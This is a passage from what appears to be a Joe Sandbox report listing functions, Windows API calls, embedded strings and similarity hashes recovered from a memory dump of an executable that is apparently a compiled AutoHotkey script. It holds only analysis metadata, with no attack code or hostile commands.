GetForegroundWindow.USER32(?,?,?,?,00444ABE,80000000,80000000), ref: 00475D23
SetForegroundWindow.USER32(00000000,?,?,?,?,00444ABE,80000000,80000000), ref: 00475D32

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$Foreground$Menu$CheckItem$CursorMessagePopupPostProcessThreadTrack
String ID:
API String ID: 4142709844-0
Opcode ID: 03927f39166567778a8a482389c70f793ff30f5cafff52d7a2d8eeb5e46eab6e
Instruction ID: 31e8896b96980ec48f3283b59f5d4111911a9048dc59e77e901e9751e97720d7
Opcode Fuzzy Hash: 03927f39166567778a8a482389c70f793ff30f5cafff52d7a2d8eeb5e46eab6e
Instruction Fuzzy Hash: 835119716857029FD720EF24DC85BB677A4AB45704F04853BF8489B391E3B9EC448B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0043E230, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 301COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 0043E2AB
_wcschr.LIBCMT ref: 0043E2D6
GetKeyboardLayout.USER32(00000000), ref: 0043E32A
IsCharAlphaW.USER32(00000000), ref: 0043E413
_free.LIBCMT ref: 0043E4FD
_malloc.LIBCMT ref: 0043E50A
_wcschr.LIBCMT ref: 0043E564

Strings

0, xrefs: 0043E41D
Out of memory., xrefs: 0043E51E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: KeyboardLayout_wcschr$AlphaChar_free_malloc
String ID: 0$Out of memory.
API String ID: 2524737710-1027521833
Opcode ID: d33275ce5e5769519b4ee243a93ea2d893dfcf2a4657027c734d8e6c981661d8
Instruction ID: 6833922acdf2a6135e39435e3c23d6cab28ec57b81003e412c993bdd1d61b60b
Opcode Fuzzy Hash: d33275ce5e5769519b4ee243a93ea2d893dfcf2a4657027c734d8e6c981661d8
Instruction Fuzzy Hash: A6B1D57150A34196DB25DF2A84417AB7BE0AF99314F08186FF884873D2E76CC94DC7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00416C40, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

@, xrefs: 00416ED8

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 86b5080ac27fdcb64362eeec104b3a1ca7da03ef0c64a511587322c2d440352d
Instruction ID: 6a8099e613b3d2b931f3f2fa9793288decd4004efc1a96cd3875363ebfe5e5a6
Opcode Fuzzy Hash: 86b5080ac27fdcb64362eeec104b3a1ca7da03ef0c64a511587322c2d440352d
Instruction Fuzzy Hash: 99A1C0756093049FE728DF28D8847AB77E5EB84305F15492FF48282291D73CE9C6CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405799, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

htonl.WSOCK32(?), ref: 004059AC
inet_ntoa.WSOCK32(00000000,00000000,?,00000000,00000000), ref: 004059E1

Strings

tcp, xrefs: 004058D8
udp, xrefs: 004058B7

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: htonlinet_ntoa
String ID: tcp$udp
API String ID: 298042256-3725065008
Opcode ID: da8c8e931aa1151da62f71e75a9a935053caf025badbf65c2972df371cdd0db8
Instruction ID: d485ca3e501750b0afb22945afdc98cfdd5dc79e5835cdaa14df006e22b85584
Opcode Fuzzy Hash: da8c8e931aa1151da62f71e75a9a935053caf025badbf65c2972df371cdd0db8
Instruction Fuzzy Hash: 41916971900A19DFDF219FA5C484AAF7BA5EB05720F14817BE841BB3A1C3388D91DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC50, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041CC6B
__wcsicoll.LIBCMT ref: 0041CC84

Strings

UTF-16-RAW, xrefs: 0041CCB0
UTF-8, xrefs: 0041CC65
UTF-16, xrefs: 0041CC97
UTF-8-RAW, xrefs: 0041CC7E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: UTF-16$UTF-16-RAW$UTF-8$UTF-8-RAW
API String ID: 3832890014-2787617770
Opcode ID: c4d95be7f7b2611fa90f7081c1e0cd4c99a1e264b163c4f871a9a88f38321284
Instruction ID: 6954d979211cdc3966ecffea90f4f8a6efc277285e8bbb0a02d56b117f65dd67
Opcode Fuzzy Hash: c4d95be7f7b2611fa90f7081c1e0cd4c99a1e264b163c4f871a9a88f38321284
Instruction Fuzzy Hash: 33017552A8562222AE20312D7C02BEB114C0B52719F16457BFC0CE6386FA4DCDC150ED

Uniqueness

Uniqueness Score: -1.00%

Function 0047EC20, Relevance: 15.1, APIs: 10, Instructions: 126COMMON

Download Yara Rule

APIs

CharLowerW.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0047EC37
CharUpperW.USER32(?,?,?), ref: 0047EC52
CharLowerW.USER32(?,?,?,?), ref: 0047EC7E
CharUpperW.USER32(?,?,?,?), ref: 0047EC93
CharLowerW.USER32(?,?,?,?), ref: 0047ECCD
CharLowerW.USER32(00000000,?,?,?,?), ref: 0047ECDA
CharLowerW.USER32(?,?,?,?,?,?), ref: 0047ECF4
CharLowerW.USER32(?,?,?,?,?,?), ref: 0047ED02
CharLowerW.USER32(?,?,?,?,?,?), ref: 0047ED1E
CharLowerW.USER32(00000000,?,?,?,?,?), ref: 0047ED2B

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Char$Lower$Upper
String ID:
API String ID: 3371602591-0
Opcode ID: c625a15b7220c8782acbaa29582dbe6005ee596784ff7df151b0475137f72a06
Instruction ID: c45711c1a3d3d363a293bb5d0f9e24ced5a83681fe618604d4d634d1451c03b5
Opcode Fuzzy Hash: c625a15b7220c8782acbaa29582dbe6005ee596784ff7df151b0475137f72a06
Instruction Fuzzy Hash: 284191255043729BCB749F279C815BBB7E8AE88711B058A9BFCC9C6380D63CEC40D679

Uniqueness

Uniqueness Score: -1.00%

Function 00452880, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 315COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004D65E8,00000000,?,00000000), ref: 004528A7
LeaveCriticalSection.KERNEL32(004D65E8), ref: 00452A0C
LeaveCriticalSection.KERNEL32(004D65E8), ref: 00452BBC
_free.LIBCMT ref: 00452C07
__wcsdup.LIBCMT ref: 00452C31
LeaveCriticalSection.KERNEL32(004D65E8), ref: 00452C74

Strings

Compile error %d at offset %d: %hs, xrefs: 00452B3D
0, xrefs: 00452B55

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CriticalSection$Leave$Enter__wcsdup_free
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 2407865940-2351679343
Opcode ID: d08d3f8164908ccb6b99e2030241cfad1443b19c47d99e8352f4da9a987a0573
Instruction ID: 6dc04ff53638ae3933d48b47589090b126d0e15452f806a4730e97df75ca092a
Opcode Fuzzy Hash: d08d3f8164908ccb6b99e2030241cfad1443b19c47d99e8352f4da9a987a0573
Instruction Fuzzy Hash: A5C1F3B26043019BC720DF24D98076677E0FF96316F144A6FE85587392D3B8ED49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00457340, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 224windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(032150C8,00001032,00000000,00000000), ref: 0045741F
__wcsnicmp.LIBCMT ref: 0045743A
SendMessageW.USER32(032150C8,00001004,00000000,00000000), ref: 00457471

Strings

$%K, xrefs: 0045739A
Col, xrefs: 00457434

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$__wcsnicmp
String ID: $%K$Col
API String ID: 2103314646-623996615
Opcode ID: 3c1a0149e475937235dea2334087f983fd0489e85ddd6b290dbe0a30b4865a0f
Instruction ID: 4a47ab7fd94302390491453de3848d1bb4fecd98d3e543bd21ffa1e61870ca2d
Opcode Fuzzy Hash: 3c1a0149e475937235dea2334087f983fd0489e85ddd6b290dbe0a30b4865a0f
Instruction Fuzzy Hash: 6A61F0716043059BD720CF29E881B2AB7E5EB85726F50457FED4887392E738DC09C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00439AE0, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 204COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00439CF0

Strings

The current thread will exit., xrefs: 00439D6A, 00439D76
File, xrefs: 00439CA2
__Delete will now return., xrefs: 00439D63
Line, xrefs: 00439C7E
Message, xrefs: 00439C39
Extra, xrefs: 00439C5A
This DllCall requires a prior VarSetCapacity., xrefs: 00439B00

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Extra$File$Line$Message$The current thread will exit.$This DllCall requires a prior VarSetCapacity.$__Delete will now return.
API String ID: 3832890014-2095053968
Opcode ID: a279e4fb743f86a45df073ec852e6b0a1dc0b35dcf5352cbe1d72b5c72f38c3d
Instruction ID: fb6b0ec9d4e69e78f5ffaa851aaf5b9f6515474f4316263728a76d4a6989540e
Opcode Fuzzy Hash: a279e4fb743f86a45df073ec852e6b0a1dc0b35dcf5352cbe1d72b5c72f38c3d
Instruction Fuzzy Hash: 5361E1706043009BDB10DB15DC42BAAB3E4AB89718F14156FF988AB3D2D7B8AD41C79E

Uniqueness

Uniqueness Score: -1.00%

Function 0044EB60, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0044EB93
GetForegroundWindow.USER32 ref: 0044EB9A

Strings

0, xrefs: 0044EBEC

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CountForegroundTickWindow
String ID: 0
API String ID: 1022652907-4108050209
Opcode ID: 77d6d5304e11f501d262b19edfcc0d63a2706bd11e419cfaa142dbfc0bac6d0a
Instruction ID: f5b50f9b7c54a88f8cf07e7a901a8c7c6d12123378199f83906bdb5d5acbbb07
Opcode Fuzzy Hash: 77d6d5304e11f501d262b19edfcc0d63a2706bd11e419cfaa142dbfc0bac6d0a
Instruction Fuzzy Hash: B641B1727062049BDB10EF6AFC84A56BBE5FB84314F04457BED09C72A0E7359C04CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00477DA0, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 360COMMON

Download Yara Rule

Strings

Parameter #2 invalid., xrefs: 00477FDF
Too few parameters passed to function., xrefs: 00477DCE
Parameter #1 invalid., xrefs: 00477E56

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: Parameter #1 invalid.$Parameter #2 invalid.$Too few parameters passed to function.
API String ID: 0-982959277
Opcode ID: 9c1df1641c444b4f62f5cc2f0fafd06efe0c7fed6950a3164a310ce7dea1d547
Instruction ID: f630a66b999d8aa58931c6016bf95d278f9712724bbe954582cc16e852d9803a
Opcode Fuzzy Hash: 9c1df1641c444b4f62f5cc2f0fafd06efe0c7fed6950a3164a310ce7dea1d547
Instruction Fuzzy Hash: 76D17A316042069FDB24CF29C984AABB3E0FB84314F54CA6FE85987341DB79ED45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00407F6B, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 00407FD6
__wcstoui64.LIBCMT ref: 00407FE6
__wcsicoll.LIBCMT ref: 00408054

Strings

X, xrefs: 004080EE
<response command="source" success="1" transaction_id="%e" encoding="base64">, xrefs: 004080D9
<response command="source" success="0" transaction_id="%e"/>, xrefs: 00408297
</response>, xrefs: 0040823E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcstoui64$__wcsicoll
String ID: </response>$<response command="source" success="0" transaction_id="%e"/>$<response command="source" success="1" transaction_id="%e" encoding="base64">$X
API String ID: 400967290-3349388145
Opcode ID: e8cc28e0507162e9bd3905950783aa4df0bc0fed13784dc7108bb8c9115e9fd5
Instruction ID: d7d4ab5dbe4299628e8fcf974880a84ab9b8284f720f19f78cbf069d0e10c68c
Opcode Fuzzy Hash: e8cc28e0507162e9bd3905950783aa4df0bc0fed13784dc7108bb8c9115e9fd5
Instruction Fuzzy Hash: A191BB316087419FD720DB69C981B5BB3E8AF84714F144A3EF5D4EB2D1DB38D8098B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00437880, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004378C7
_wcsncpy.LIBCMT ref: 00437933
_wcsncpy.LIBCMT ref: 00437956
_wcschr.LIBCMT ref: 004379F3
_free.LIBCMT ref: 00437A15
_free.LIBCMT ref: 00437AFA

Strings

Out of memory., xrefs: 004378DE

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _free_wcsncpy$_malloc_wcschr
String ID: Out of memory.
API String ID: 609840974-4087320997
Opcode ID: cd362208529776b4ee64db89e6290fc5ed964c511c87ba01fca270ef0ff52f9c
Instruction ID: 1e98a8e433f1218de5c8627e0b7d04fdb0d23eafbed83c84c047fbfcc99af33d
Opcode Fuzzy Hash: cd362208529776b4ee64db89e6290fc5ed964c511c87ba01fca270ef0ff52f9c
Instruction Fuzzy Hash: 9C91B2B1E042199BDF30DF58C8416AFB3B5EF88314F4440ABE88597341E778AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408BEA, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 194COMMON

Download Yara Rule

APIs

__ultow.LIBCMT ref: 00408C59

Strings

amp, xrefs: 00408D52, 00408D5E
quot, xrefs: 00408D59
apos, xrefs: 00408D4B
&%s;, xrefs: 00408D64

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __ultow
String ID: &%s;$amp$apos$quot
API String ID: 2316798077-350231602
Opcode ID: 2186a1b1c5a6b8842e2f35185e9e10a675141d5ed972d8c943012182ab968dc4
Instruction ID: ccd0f4e85a436ebc465f1da52427983af2357205af3ed6c6eb972b5cee950409
Opcode Fuzzy Hash: 2186a1b1c5a6b8842e2f35185e9e10a675141d5ed972d8c943012182ab968dc4
Instruction Fuzzy Hash: 4651E5315042059BEB24CF68C64467ABBB1EF72304B24427FD8C2B73D2DB399E469B19

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED2, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 169networkCOMMON

Download Yara Rule

APIs

WSAAsyncSelect.WSOCK32(?,00000000,00000000,004D8690,?,00000001), ref: 00405F08
ioctlsocket.WSOCK32(?,8004667E,?,?,00000001), ref: 00405F1A
WSAAsyncSelect.WSOCK32(?,00000408,00000021,?), ref: 004060AD

Strings

<error code="%i"/></response>, xrefs: 00405FDD
<response command="%s" transaction_id="%e"/>, xrefs: 00406068
<response command="%s" transaction_id="%e, xrefs: 00405FBF

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AsyncSelect$ioctlsocket
String ID: <error code="%i"/></response>$<response command="%s" transaction_id="%e$<response command="%s" transaction_id="%e"/>
API String ID: 1808490365-3791457405
Opcode ID: 47bd5fe475b016dc9bae9e1063c9e159da6fbe561a4c0b52880c4f2907b89755
Instruction ID: c2b33db892e475fe3458d3e53ca71d97b2fca872fb8add79224e1ce5679ef139
Opcode Fuzzy Hash: 47bd5fe475b016dc9bae9e1063c9e159da6fbe561a4c0b52880c4f2907b89755
Instruction Fuzzy Hash: F651FB716006069BCB21DBB4CD80A6F77B9EB14318F10063FE586A22D1E739ED45CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0041EA90, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

%s file "%s" cannot be opened., xrefs: 0041EBB4
Script, xrefs: 0041EBAD, 0041EBB3
#Include, xrefs: 0041EBA4
Out of memory., xrefs: 0041EB38
Too many includes., xrefs: 0041EADF

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: #Include$%s file "%s" cannot be opened.$Out of memory.$Script$Too many includes.
API String ID: 0-2811576419
Opcode ID: fae5a507143920737594c3210aa6fbcca7a2deade0f9a699c7bb62133a1c026f
Instruction ID: 1459470ae94e491c2fc88ea3b9b23937ba2306443cada7ec580022f9faebf9b3
Opcode Fuzzy Hash: fae5a507143920737594c3210aa6fbcca7a2deade0f9a699c7bb62133a1c026f
Instruction Fuzzy Hash: AA41C53A7043155BD320DB16EC81BF77394EB85360F14443FED5587292EA3DA88987AD

Uniqueness

Uniqueness Score: -1.00%

Function 004757A0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004757C8
CreatePopupMenu.USER32(03211AA0,?,?,?,?,?,?,?,?,?,?,?,00475BB8), ref: 004757F4
SetMenuDefaultItem.USER32(?,00444ABE,00000000,?,?,?,?,?,?,?,?,?,?,?,00475BB8), ref: 00475838
SetMenuInfo.USER32 ref: 0047587E
SetMenuInfo.USER32 ref: 004758A1
CreateMenu.USER32(03211AA0,?,?,?,?,?,?,?,?,?,?,?,00475BB8), ref: 004758B7

Strings

tray, xrefs: 004757C2

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Menu$CreateInfo$DefaultItemPopup__wcsicoll
String ID: tray
API String ID: 3246407819-3344156567
Opcode ID: 0b639d8ec9f0d3d62aac4b85b6e8b90779e9da85ec154f703081ecfa34f773a1
Instruction ID: 56c75e031244fe020dd8bbd24995d2b0ddeca37da19dcd4ccaf7d895a817aeb9
Opcode Fuzzy Hash: 0b639d8ec9f0d3d62aac4b85b6e8b90779e9da85ec154f703081ecfa34f773a1
Instruction Fuzzy Hash: 2F313E71604B009BD720DF25C84479BB7E5BFC8714F158A1EE48D8B340EBB8E8058B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0049BAB8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0049BAC4

Part of subcall function 0049C462: __getptd_noexit.LIBCMT ref: 0049C465
Part of subcall function 0049C462: __amsg_exit.LIBCMT ref: 0049C472

__amsg_exit.LIBCMT ref: 0049BAE4
__lock.LIBCMT ref: 0049BAF4
InterlockedDecrement.KERNEL32(?), ref: 0049BB11
_free.LIBCMT ref: 0049BB24
